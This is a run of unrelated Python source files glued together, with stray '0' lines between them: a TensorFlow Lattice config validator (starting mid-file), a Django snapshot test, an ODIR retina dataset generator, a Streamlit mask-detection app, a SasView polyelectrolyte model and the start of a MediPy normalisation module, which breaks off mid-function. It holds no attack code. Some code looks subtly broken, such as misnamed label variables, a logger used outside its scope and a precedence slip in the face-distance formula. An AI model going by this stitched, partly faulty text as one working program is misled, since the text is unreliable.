lattice. If not, tell user to use # CalibratedLattice instead. if len(model_config.lattices) < 2: raise ValueError( 'CalibratedLatticeEnsemble must have >= 2 lattices. For single ' 'lattice models, use CalibratedLattice instead.') for lattice in model_config.lattices: if (not np.iterable(lattice) or any(not isinstance(x, str) for x in lattice)): raise ValueError( 'Lattices are not fully specified for ensemble config.') else: raise ValueError( 'Lattices are not fully specified for ensemble config. Lattices must ' 'be set to \'rtl_layer\' or be fully specified as a list of lists of ' 'feature names.') def _verify_kronecker_factored_config(model_config): """Verifies that a kronecker_factored model_config is properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If there are lattice regularizers. ValueError: If there are per-feature lattice regularizers. ValueError: If there are unimodality constraints. ValueError: If there are trust constraints. ValueError: If there are dominance constraints. 
""" for regularizer_config in model_config.regularizer_configs or []: if not regularizer_config.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX): raise ValueError( 'KroneckerFactoredLattice layer does not currently support ' 'lattice regularizers.') for feature_config in model_config.feature_configs: for regularizer_config in feature_config.regularizer_configs or []: if not regularizer_config.name.startswith( _INPUT_CALIB_REGULARIZER_PREFIX): raise ValueError( 'KroneckerFactoredLattice layer does not currently support ' 'per-feature lattice regularizers.') # Check that all lattices sizes for all features are the same. if any(feature_config.lattice_size != model_config.feature_configs[0].lattice_size for feature_config in model_config.feature_configs): raise ValueError('KroneckerFactoredLattice layer must have the same ' 'lattice size for all features.') # Check that there are only monotonicity and bound constraints. if any( feature_config.unimodality != 'none' and feature_config.unimodality != 0 for feature_config in model_config.feature_configs): raise ValueError( 'KroneckerFactoredLattice layer does not currently support unimodality ' 'constraints.') if any(feature_config.reflects_trust_in is not None for feature_config in model_config.feature_configs): raise ValueError( 'KroneckerFactoredLattice layer does not currently support trust ' 'constraints.') if any(feature_config.dominates is not None for feature_config in model_config.feature_configs): raise ValueError( 'KroneckerFactoredLattice layer does not currently support dominance ' 'constraints.') def _verify_aggregate_function_config(model_config): """Verifies that an aggregate function model_config is properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If `middle_dimension < 1`. ValueError: If `model_config.middle_monotonicity` is not None and `model_config.middle_calibration` is not True. """ if model_config.middle_dimension < 1: raise ValueError('Middle dimension must be at least 1: {}'.format( model_config.middle_dimension)) if (model_config.middle_monotonicity is not None and not model_config.middle_calibration): raise ValueError( 'middle_calibration must be true when middle_monotonicity is ' 'specified.') def _verify_feature_config(feature_config): """Verifies that feature_config is properly specified. Args: feature_config: Feature configuration object describing an input feature to a model. Should be an instance of `tfl.configs.FeatureConfig`. Raises: ValueError: If `feature_config.pwl_calibration_input_keypoints` is not iterable or contains non-{int/float} values for a numerical feature. ValueError: If `feature_config.monotonicity` is not an iterable for a categorical feature. ValueError: If any element in `feature_config.monotonicity` is not an iterable for a categorical feature. ValueError: If any value in any element in `feature_config.monotonicity` is not an int for a categorical feature. ValueError: If any value in any element in `feature_config.monotonicity` is not in the range `[0, feature_config.num_buckets]` for a categorical feature. """ if not feature_config.num_buckets: # Validate PWL Calibration configuration. 
    if (not np.iterable(feature_config.pwl_calibration_input_keypoints) or
        any(not isinstance(x, (int, float))
            for x in feature_config.pwl_calibration_input_keypoints)):
      raise ValueError('Input keypoints are invalid for feature {}: {}'.format(
          feature_config.name,
          feature_config.pwl_calibration_input_keypoints))
  elif feature_config.monotonicity and feature_config.monotonicity != 'none':
    # Validate Categorical Calibration configuration.
    if not np.iterable(feature_config.monotonicity):
      raise ValueError('Monotonicity is not a list for feature {}: {}'.format(
          feature_config.name, feature_config.monotonicity))
    for i, t in enumerate(feature_config.monotonicity):
      if not np.iterable(t):
        raise ValueError(
            'Element {} is not a list/tuple for feature {} monotonicity: {}'
            .format(i, feature_config.name, t))
      for j, val in enumerate(t):
        if not isinstance(val, int):
          raise ValueError(
              'Element {} for list/tuple {} for feature {} monotonicity is '
              'not an index: {}'.format(j, i, feature_config.name, val))
        if val < 0 or val >= feature_config.num_buckets:
          raise ValueError(
              'Element {} for list/tuple {} for feature {} monotonicity is '
              'an invalid index not in range [0, num_buckets - 1]: {}'.format(
                  j, i, feature_config.name, val))


def verify_config(model_config):
  """Verifies that the model_config and feature_configs are properly specified.

  Args:
    model_config: Model configuration object describing model architecture.
      Should be one of the model configs in `tfl.configs`.

  Raises:
    ValueError: If `model_config.feature_configs` is None.
    ValueError: If `model_config.output_initialization` is not iterable or
      contains non-{int/float} values.
  """
  if model_config.feature_configs is None:
    raise ValueError('Feature configs must be fully specified.')
  if isinstance(model_config, configs.CalibratedLatticeEnsembleConfig):
    _verify_ensemble_config(model_config)
  if ((isinstance(model_config, configs.CalibratedLatticeEnsembleConfig) or
       isinstance(model_config, configs.CalibratedLatticeConfig)) and
      model_config.parameterization == 'kronecker_factored'):
    _verify_kronecker_factored_config(model_config)
  if isinstance(model_config, configs.AggregateFunctionConfig):
    _verify_aggregate_function_config(model_config)
  for feature_config in model_config.feature_configs:
    _verify_feature_config(feature_config)
  if (not np.iterable(model_config.output_initialization) or
      any(not isinstance(x, (int, float))
          for x in model_config.output_initialization)):
    raise ValueError('Output initialization is invalid: {}'.format(
        model_config.output_initialization))


import pytest

pytestmark = pytest.mark.django_db


def test_robots_txt(client, snapshot):
    response = client.get("/robots.txt")
    assert response.status_code == 200
    snapshot.assert_match(response.content)


def test_ping(client, snapshot):
    response = client.get("/ping")
    assert response.status_code == 200
    snapshot.assert_match(response.content)


# kalyan-iiitbh/ML-Retina10-100
# Copyright 2019-2020 . All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
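# The generator below expects an ODIR-style ground-truth CSV with a header
# row (skipped by checking for the literal "ID" in the first column) followed
# by one row per image: column 0 is the image id/filename and columns 1-8 are
# 0/1 flags for normal, diabetes, glaucoma, cataract, AMD, hypertension,
# myopia and others, in that order.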
# ============================================================================== from absl import app import logging import logging.config import time import csv import cv2 import os import numpy as np import glob class NumpyDataGenerator: def __init__(self, training_path, testing_path, csv_path, csv_testing_path, augmented_path, csv_augmented_file): self.training_path = training_path self.testing_path = testing_path self.csv_path = csv_path self.csv_testing_path = csv_testing_path self.logger = logging.getLogger('odir') self.total_records_training = 0 self.total_records_testing = 0 self.csv_augmented_path = csv_augmented_file self.augmented_path = augmented_path def npy_training_files(self, file_name_training, file_name_training_labels): training = [] training_labels = [] self.logger.debug("Opening CSV file") with open(self.csv_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_training = 0 for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.training_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) training.append(image) training_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_training = self.total_records_training + 1 training = np.array(training, dtype='uint8') training_labels = np.array(training_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) training = np.reshape(training, [training.shape[0], training.shape[1], training.shape[2], training.shape[3]]) # save numpy array as .npy formats np.save(file_name_training, training) self.logger.debug("Saving NPY File: " + file_name_training) np.save(file_name_training_labels, training_labels) self.logger.debug("Saving NPY File: " + file_name_training_labels) self.logger.debug("Closing CSV file") def npy_testing_files(self, file_name_testing, file_name_testing_labels): testing = [] testing_labels = [] self.logger.debug("Opening CSV file") with open(self.csv_testing_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_testing = 0 for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id + "_left.jpg") # load first the image from the folder eye_image = os.path.join(self.testing_path, column_id + "_left.jpg") image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) testing.append(image) testing_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_testing = self.total_records_testing + 1 self.logger.debug("Processing image: " + column_id + "_right.jpg") eye_image = os.path.join(self.testing_path, column_id + "_right.jpg") image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) testing.append(image) testing_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_testing = 
self.total_records_testing + 1 testing = np.array(testing, dtype='uint8') training_labels = np.array(testing_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) testing = np.reshape(testing, [testing.shape[0], testing.shape[1], testing.shape[2], testing.shape[3]]) # save numpy array as .npy formats np.save(file_name_testing, testing) self.logger.debug("Saving NPY File: " + file_name_testing) np.save(file_name_testing_labels, training_labels) self.logger.debug("Saving NPY File: " + file_name_testing_labels) self.logger.debug("Closing CSV file") def npy_training_files_split(self, split_number, file_name_training, file_name_training_labels, file_name_testing, file_name_testing_labels): training = [] training_labels = [] testing = [] testing_labels = [] self.logger.debug("Opening CSV file") count = 0 with open(self.csv_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_training = 0 self.total_records_testing = 0 for row in csv_reader: column_id = row[0] label = row[1] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.training_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) if count < split_number: testing.append(image) testing_labels.append(label) self.total_records_testing = self.total_records_testing + 1 else: training.append(image) training_labels.append(label) self.total_records_training = self.total_records_training + 1 count = count + 1 testing = np.array(testing, dtype='uint8') testing_labels = np.array(testing_labels, dtype='uint8') testing = np.reshape(testing, [testing.shape[0], testing.shape[1], testing.shape[2], testing.shape[3]]) # save numpy array as .npy formats np.save(file_name_testing, testing) np.save(file_name_testing_labels, testing_labels) training = np.array(training, dtype='uint8') training_labels = np.array(training_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) training = np.reshape(training, [training.shape[0], training.shape[1], training.shape[2], training.shape[3]]) # save numpy array as .npy formats np.save(file_name_training, training) self.logger.debug("Saving NPY File: " + file_name_training) np.save(file_name_training_labels, training_labels) self.logger.debug("Saving NPY File: " + file_name_training_labels) self.logger.debug("Closing CSV file") def is_sickness(self, row, sickness): switcher = { "normal": row[1] == '1' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "diabetes": row[1] == '0' and row[2] == '1' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "glaucoma": row[1] == '0' and row[2] == '0' and row[3] == '1' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "cataract": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '1' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "amd": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '1' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "hypertension": row[1] == '0' and 
row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[6] == '1' and row[7] == '0' and row[8] == '0', "myopia": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '1' and row[8] == '0', "others": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '1' } return switcher.get(sickness, False) def npy_training_files_split_all(self, split_number, file_name_training, file_name_training_labels, file_name_testing, file_name_testing_labels, include_augmented): split_factor = 10820 training = [] training_labels = [] training_2 = [] training_labels_2 = [] testing = [] testing_labels = [] images_used = [] count_images = 0 class_names = ['normal', 'diabetes', 'glaucoma', 'cataract', 'amd', 'hypertension', 'myopia', 'others'] self.logger.debug("Opening CSV file") class_count = {'normal': 0, 'diabetes': 0, 'glaucoma': 0, 'cataract': 0, 'amd': 0, 'hypertension': 0, 'myopia': 0, 'others': 0} split_pocket = split_number / 8 with open(self.csv_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_training = 0 self.total_records_testing = 0 for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.training_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) found = False for sickness in class_names: if self.is_sickness(row, sickness) and class_count[sickness] < split_pocket: testing.append(image) images_used.append(row[0] + ',' + sickness + ',' + str(class_count[sickness])) testing_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_testing = self.total_records_testing + 1 class_count[sickness] = class_count[sickness] + 1 found = True logger.debug('found ' + sickness + ' ' + str(class_count[sickness])) if not found: training.append(image) training_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_training = self.total_records_training + 1 count_images = count_images + 1 if include_augmented: with open(self.csv_augmented_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.augmented_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) if count_images >= split_factor: training_2.append(image) training_labels_2.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) else: training.append(image) training_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_training = self.total_records_training + 1 count_images = count_images + 1 testing = np.array(testing, dtype='uint8') testing_labels = np.array(testing_labels, dtype='uint8') testing = np.reshape(testing, [testing.shape[0], testing.shape[1], 
testing.shape[2], testing.shape[3]]) # save numpy array as .npy formats np.save(file_name_testing, testing) np.save(file_name_testing_labels, testing_labels) training = np.array(training, dtype='uint8') training_labels = np.array(training_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) training = np.reshape(training, [training.shape[0], training.shape[1], training.shape[2], training.shape[3]]) # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) if include_augmented: training_2 = np.array(training_2, dtype='uint8') training_labels_2 = np.array(training_labels_2, dtype='uint8') training_2 = np.reshape(training_2, [training_2.shape[0], training_2.shape[1], training_2.shape[2], training_2.shape[3]]) self.logger.debug(testing.shape) self.logger.debug(testing_labels.shape) self.logger.debug(training.shape) self.logger.debug(training_labels.shape) if include_augmented: self.logger.debug(training_2.shape) self.logger.debug(training_labels_2.shape) # save numpy array as .npy formats np.save(file_name_training + '_1', training) np.save(file_name_training_labels + '_1', training_labels) if include_augmented: np.save(file_name_training + '_2', training_2) np.save(file_name_training_labels + '_2', training_labels_2) self.logger.debug("Closing CSV file") for sickness in class_names: self.logger.debug('found ' + sickness + ' ' + str(class_count[sickness])) csv_writer = csv.writer(open("files_used.csv", 'w', newline='')) for item in images_used: self.logger.debug(item) entries = item.split(",") csv_writer.writerow(entries) def main(argv): start = time.time() image_width = 224 training_path = r'C:\temp\ODIR-5K_Training_Dataset_treated' + '_' + str(image_width) testing_path = r'C:\temp\ODIR-5K_Testing_Images_treated' + '_' + str(image_width) augmented_path = r'C:\temp\ODIR-5K_Training_Dataset_augmented' + '_' + str(image_width) csv_file = r'ground_truth\odir.csv' csv_augmented_file = r'ground_truth\odir_augmented.csv' training_file = r'ground_truth\testing_default_value.csv' logger.debug('Generating npy files') generator = NumpyDataGenerator(training_path, testing_path, csv_file, training_file, augmented_path, csv_augmented_file) # Generate testing file generator.npy_testing_files('odir_testing_challenge' + '_' + str(image_width), 'odir_testing_labels_challenge' + '_' + str(image_width)) # Generate training file # generator.npy_training_files('odir_training', 'odir_training_labels') # generator.npy_training_files_split(1000, 'odir_training', # 'odir_training_labels', 'odir_testing', 'odir_testing_labels') # generator.npy_training_files_split_all(400, 'odir_training' + '_' + str(image_width), # 'odir_training_labels' + '_' + str(image_width), # 'odir_testing' + '_' + str(image_width), # 'odir_testing_labels' + '_' + str(image_width), # True) end = time.time() logger.debug('Training Records ' + str(generator.total_records_training)) logger.debug('Testing Records ' + str(generator.total_records_testing)) logger.debug('All Done in ' + str(end - start) + ' seconds') if __name__ == '__main__': # create logger logging.config.fileConfig('logging.conf') logger = logging.getLogger('odir') app.run(main) 0 from torchvision.models.detection.faster_rcnn import FastRCNNPredictor import streamlit as st import torch import torchvision from PIL import Image 
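# The Streamlit app below combines two detectors: a YOLOv3 face detector
# loaded through OpenCV's DNN module (cfg/weights files) and a torchvision
# Faster R-CNN mask detector with a replaced box-predictor head. Detected
# masks are matched to detected faces by bounding-box overlap in `matching`,
# and faces without a matching mask are drawn in red.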
from torchvision.transforms import ToTensor import matplotlib.pyplot as plt import matplotlib.patches as patches from yoloface import * import copy st.set_option('deprecation.showPyplotGlobalUse', False) device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu') def get_model_instance_segmentation(num_classes, pretrained=True): model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=pretrained) model.roi_heads.box_predictor = FastRCNNPredictor(model.roi_heads.box_predictor.cls_score.in_features, num_classes) return model @st.cache(show_spinner=False) def get_mask_model(): model = get_model_instance_segmentation(3, pretrained=False) model.load_state_dict(torch.load('models/model.pt', map_location=device)) model.to(device) model.eval() return model @st.cache(allow_output_mutation=True, show_spinner=False) def get_face_model(): model_cfg = 'cfg/yolov3-face.cfg' model_weights = 'models/yolov3-wider_16000.weights' net = cv2.dnn.readNetFromDarknet(model_cfg, model_weights) net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV) net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU) return net def run_face_model(net, img): import numpy as np frame = np.asarray(img)[:, :, ::-1].copy() blob = cv2.dnn.blobFromImage(frame, 1 / 255, (IMG_WIDTH, IMG_HEIGHT), [0, 0, 0], 1, crop=False) net.setInput(blob) outs = net.forward(get_outputs_names(net)) faces = post_process(frame, outs, CONF_THRESHOLD, NMS_THRESHOLD) return faces # st.write(faces) @st.cache(allow_output_mutation=True, show_spinner=False) def run_model(img_data): with st.spinner('Loading AI model...'): mask_model = get_mask_model() face_model = get_face_model() with st.spinner('Running AI model...'): pil_img = Image.open(img_data) img = ToTensor()(pil_img).unsqueeze(0) face_pred = run_face_model(face_model, pil_img) face_pred = [face for face in face_pred if face[2] * face[3] > 300] mask_pred = mask_model(img) # filter out non-mask predictions mask_pred = [box for label, box in zip(mask_pred[0]['labels'], mask_pred[0]['boxes']) if label == 1] new_mask_pred = [] for box in mask_pred: xmin, ymin, xmax, ymax = box new_mask_pred.append((xmin.item(), ymin.item(), (xmax - xmin).item(), (ymax - ymin).item())) mask_pred = new_mask_pred return pil_img, img, mask_pred, face_pred def predict(img_data, env): pil_img, img, mask_pred, face_pred = run_model(img_data) with st.spinner('Processing Results...'): img = img[0].cpu().data fig, ax = plt.subplots(1) ax.imshow(img.permute(1, 2, 0)) bad, good = matching(mask_pred, face_pred) plot_faces_annotated(fig, ax, good, color='g') plot_faces_annotated(fig, ax, bad, color='r') ax.axis('off') st.pyplot() st.markdown(f'## **{100*len(good)/(len(good)+len(bad)):.2f}%** of Individuals are Masked') st.markdown(f'## COVID Danger Score is **{round(10*len(bad)/(len(good)+len(bad))) + (1 if env == "Indoor" else 0)}**') import plotly.express as px fig = px.bar(x=['Mask', 'No Mask'], y=[len(good), len(bad)], labels={'x': 'Mask Status', 'y': '# of Detected Faces'}, title='Summary of Detections') st.plotly_chart(fig) st.success('Your image has been processed!') st.balloons() def plot_line_between_faces(fig, ax, f1, f2, text=None, color='blue'): x = [f1[0] + f1[2] / 2, f2[0] + f2[2] / 2] y = [f1[1] + f1[3] / 2, f2[1] + f2[3] / 2] ax.plot(x, y, c=color) if text is not None: ax.text(np.mean(x), np.mean(y), text) def area(a, b): # returns None if rectangles don't intersect dx = min(a.xmax, b.xmax) - max(a.xmin, b.xmin) dy = min(a.ymax, b.ymax) - max(a.ymin, b.ymin) if (dx >= 0) and (dy >= 0): return dx 
* dy def distance_to_face(face): focal_length = 200 avg_face_width = 150 avg_face_height = 0.65 return (focal_length * avg_face_width / face[2]) / 304.8 def distance_between_faces(f1, f2): deltax = abs(f1[0] - f2[0]) avg_face_width = 0.5 avg_face_width_pixels = (f1[2] + f2[2] / 2) horizontal_distance = deltax * avg_face_width / avg_face_width_pixels vertical_distance = abs(distance_to_face(f1) - distance_to_face(f2)) return (horizontal_distance ** 2 + vertical_distance ** 2) ** (0.5) def overlap(b1, b2): from collections import namedtuple Rectangle = namedtuple('Rectangle', 'xmin ymin xmax ymax') ra = Rectangle(b1[0], b1[1], b1[0] + b1[2], b1[1] + b1[3]) rb = Rectangle(b2[0], b2[1], b2[0] + b2[2], b2[1] + b2[3]) ret = area(ra, rb) return ret if ret is not None else 0 def matching(masks, faces, threshold=0.5): faces = copy.deepcopy(faces) matches = [] for mask in copy.deepcopy(masks): intersection = [overlap(mask, face) for face in faces] if len(intersection) > 0: best_match = np.argsort(intersection)[-1] if intersection[best_match] > threshold * mask[2] * mask[3]: matches.append(faces.pop(best_match)) return faces, matches def plot_faces_annotated(fig, ax, labels, color='b'): for box in labels: rect = patches.Rectangle((box[0], box[1]), box[2], box[3], linewidth=1, edgecolor=color, facecolor='none') ax.add_patch(rect) def plot_masks_annotated(fig, ax, annotation, color='r'): for label, box in zip(annotation["labels"], annotation["boxes"]): if label != 1: continue xmin, ymin, xmax, ymax = box rect = patches.Rectangle((xmin, ymin), (xmax - xmin), (ymax - ymin), linewidth=1, edgecolor=color, facecolor='none') ax.add_patch(rect) 0 r""" Definition ---------- This model calculates the structure factor of a polyelectrolyte solution with the RPA expression derived by Borue and Erukhimovich\ [#Borue]_. Note however that the fitting procedure here does not follow the notation in that reference as 's' and 't' are **not** decoupled. Instead the scattering intensity $I(q)$ is calculated as .. math:: I(q) = K\frac{q^2+k^2}{4\pi L_b\alpha ^2} \frac{1}{1+r_{0}^2(q^2+k^2)(q^2-12hC_a/b^2)} + background k^2 = 4\pi L_b(2C_s + \alpha C_a) r_{0}^2 = \frac{1}{\alpha \sqrt{C_a} \left( b/\sqrt{48\pi L_b}\right)} where $K$ is the contrast factor for the polymer which is defined differently than in other models and is given in barns where $1 barn = 10^{-24} cm^2$. $K$ is defined as: .. math:: K = a^2 a = b_p - (v_p/v_s) b_s where $b_p$ and $b_s$ are sum of the scattering lengths of the atoms constituting the monomer of the polymer and the sum of the scattering lengths of the atoms constituting the solvent molecules respectively, and $v_p$ and $v_s$ are the partial molar volume of the polymer and the solvent respectively $L_b$ is the Bjerrum length(|Ang|) - **Note:** This parameter needs to be kept constant for a given solvent and temperature! $h$ is the virial parameter (|Ang^3|/mol) - **Note:** See [#Borue]_ for the correct interpretation of this parameter. It incorporates second and third virial coefficients and can be Negative. $b$ is the monomer length(|Ang|), $C_s$ is the concentration of monovalent salt(mol/L), $\alpha$ is the ionization degree (ionization degree : ratio of charged monomers to total number of monomers), $C_a$ is the polymer molar concentration(mol/L), and $background$ is the incoherent background. For 2D data the scattering intensity is calculated in the same way as 1D, where the $\vec q$ vector is defined as .. math:: q = \sqrt{q_x^2 + q_y^2} References ---------- .. 
[#Borue] , , *Macromolecules*, 21 (1988) 3240 .. [#] , , *Journal de Physique*, 51 (1990) 545 .. [#] , , , , *J. Journal de Physique II France*, 3 (1993) 573 .. [#] , , *Europhysics Letters*, 11 (1990) 179 Authorship and Verification ---------------------------- * **Author:** NIST IGOR/DANSE **Date:** pre 2010 * **Last Modified by:** **Date:** July 24, 2016 * **Last Reviewed by:** and **Date:** October 07, 2016 """ from numpy import inf, pi, sqrt name = "be_polyelectrolyte" title = "Polyelectrolyte with the RPA expression derived by Borue and Erukhimovich" description = """ Evaluate F(x) = K 1/(4 pi Lb (alpha)^(2)) (q^(2)+k2)/(1+(r02)^(2)) (q^(2)+k2) (q^(2)-(12 h C/b^(2))) has 3 internal parameters : The inverse Debye Length: K2 = 4 pi Lb (2 Cs+alpha C) r02 =1/alpha/Ca^(0.5) (B/(48 pi Lb)^(0.5)) Ca = 6.022136e-4 C """ category = "shape-independent" # pylint: disable=bad-whitespace, line-too-long # ["name", "units", default, [lower, upper], "type", "description"], parameters = [ ["contrast_factor", "barns", 10.0, [-inf, inf], "", "Contrast factor of the polymer"], ["bjerrum_length", "Ang", 7.1, [0, inf], "", "Bjerrum length"], ["virial_param", "Ang^3/mol", 12.0, [-inf, inf], "", "Virial parameter"], ["monomer_length", "Ang", 10.0, [0, inf], "", "Monomer length"], ["salt_concentration", "mol/L", 0.0, [-inf, inf], "", "Concentration of monovalent salt"], ["ionization_degree", "", 0.05, [0, inf], "", "Degree of ionization"], ["polymer_concentration", "mol/L", 0.7, [0, inf], "", "Polymer molar concentration"], ] # pylint: enable=bad-whitespace, line-too-long def Iq(q, contrast_factor=10.0, bjerrum_length=7.1, virial_param=12.0, monomer_length=10.0, salt_concentration=0.0, ionization_degree=0.05, polymer_concentration=0.7): """ :param q: Input q-value :param contrast_factor: Contrast factor of the polymer :param bjerrum_length: Bjerrum length :param virial_param: Virial parameter :param monomer_length: Monomer length :param salt_concentration: Concentration of monovalent salt :param ionization_degree: Degree of ionization :param polymer_concentration: Polymer molar concentration :return: 1-D intensity """ concentration = polymer_concentration * 6.022136e-4 k_square = 4.0 * pi * bjerrum_length * (2*salt_concentration + ionization_degree * concentration) r0_square = 1.0/ionization_degree/sqrt(concentration) * \ (monomer_length/sqrt((48.0*pi*bjerrum_length))) term1 = contrast_factor/(4.0 * pi * bjerrum_length * ionization_degree**2) * (q**2 + k_square) term2 = 1.0 + r0_square**2 * (q**2 + k_square) * \ (q**2 - (12.0 * virial_param * concentration/(monomer_length**2))) return term1/term2 Iq.vectorized = True # Iq accepts an array of q values demo = dict(scale=1, background=0.1, contrast_factor=10.0, bjerrum_length=7.1, virial_param=12.0, monomer_length=10.0, salt_concentration=0.0, ionization_degree=0.05, polymer_concentration=0.7) tests = [ # Accuracy tests based on content in test/utest_other_models.py [{'contrast_factor': 10.0, 'bjerrum_length': 7.1, 'virial_param': 12.0, 'monomer_length': 10.0, 'salt_concentration': 0.0, 'ionization_degree': 0.05, 'polymer_concentration': 0.7, 'background': 0.001, }, 0.001, 0.0948379], # Additional tests with larger range of parameters [{'contrast_factor': 10.0, 'bjerrum_length': 100.0, 'virial_param': 3.0, 'monomer_length': 1.0, 'salt_concentration': 10.0, 'ionization_degree': 2.0, 'polymer_concentration': 10.0, 'background': 0.0, }, 0.1, -3.75693800588], [{'contrast_factor': 10.0, 'bjerrum_length': 100.0, 'virial_param': 3.0, 'monomer_length': 1.0, 
'salt_concentration': 10.0, 'ionization_degree': 2.0, 'polymer_concentration': 10.0, 'background': 100.0 }, 5.0, 100.029142149], [{'contrast_factor': 100.0, 'bjerrum_length': 10.0, 'virial_param': 180.0, 'monomer_length': 1.0, 'salt_concentration': 0.1, 'ionization_degree': 0.5, 'polymer_concentration': 0.1, 'background': 0.0, }, 200., 1.80664667511e-06], ] 0 ########################################################################## # MediPy - Copyright (C) Universite de Strasbourg # Distributed under the terms of the CeCILL-B license, as published by # the CEA-CNRS-INRIA. Refer to the LICENSE file or to # http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html # for details. ########################################################################## import itk import numpy import medipy.base import medipy.base.exception import medipy.itk import medipy.logic def mean_stdev_normalization(reference, image, mask_ref=None, mask_image=None): """ Return a normalized version of image, so that the mean and standard deviation match those of reference. """ if mask_ref : meanref=reference[numpy.nonzero(mask_ref)].mean() stdref=reference[numpy.nonzero(mask_ref)].std() else : meanref=reference.data.mean() stdref=reference.data.std() if mask_image : meanimage=image[numpy.nonzero(mask_image)].mean() stdimage=image[numpy.nonzero(mask_image)].std() else : meanimage=image.data.mean() stdimage=image.data.std() alpha = stdref/stdimage beta = meanref-meanimage*alpha data = alpha*image.data+beta output = medipy.base.Image(data=data) output.copy_information(image) return output def one_parameter_linear_regression_normalization(src,ref): """ Return a normalized version of image, so that the mean and standard deviation match those of reference. """ if src.shape != ref.shape : raise medipy.base.exception.Exception("Images must have the same size") alpha=numpy.sum(numpy.multiply(src,ref),dtype=float)/numpy.sum(numpy.multiply(src,src),dtype=float) data=alpha*src.data output = medipy.base.Image(data=data) output.copy_information(src) return output def joint_histogram( fixed, moving, mask=None, mask_value=1, bins_count_fixed=200, bins_count_moving=200, method="Nearest Neighbor"): """ Intensity normalization based on joint histogram. """ fixed_itk = medipy.itk.medipy_image_to_itk_image(fixed, False) 